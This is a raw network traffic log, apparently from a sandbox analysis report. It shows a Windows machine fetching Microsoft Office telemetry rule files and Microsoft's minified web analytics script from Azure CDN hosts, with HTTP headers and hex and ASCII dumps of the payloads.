                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                            x-ms-request-id: 8176cca2-201e-0003-2c64-3bf85a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141751Z-178bfbc474bv7whqhC1NYC1fg400000001m000000000bse4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            109192.168.2.64983913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                            x-ms-request-id: e7fd51b1-801e-0067-1163-3bfe30000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141751Z-178bfbc474bh5zbqhC1NYCkdug00000001cg00000000tebm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            110192.168.2.64983713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                            x-ms-request-id: 28a3992e-001e-0028-777f-3bc49f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141751Z-1777c6cb754dqf99hC1TEB5nps0000000axg00000000q9h9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            111192.168.2.64983813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                            x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141752Z-178bfbc474bfw4gbhC1NYCunf400000001pg0000000032wt
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            112192.168.2.64984013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                            x-ms-request-id: 833f0754-a01e-0053-540e-3b8603000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141752Z-1777c6cb754whff4hC1TEBcd6c00000009yg0000000007qw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:52 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            113192.168.2.64984413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                            x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141753Z-178bfbc474bh5zbqhC1NYCkdug00000001h000000000bfgp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            114192.168.2.64984613.107.246.454433064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                            Host: js.monitor.azure.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:53 GMT
                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                            Content-Length: 207935
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                            ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                            x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                            x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                            x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            x-azure-ref: 20241121T141753Z-178bfbc474bscnbchC1NYCe7eg00000001t0000000007cdh
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                            Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                            Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                            Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                            Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                            Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
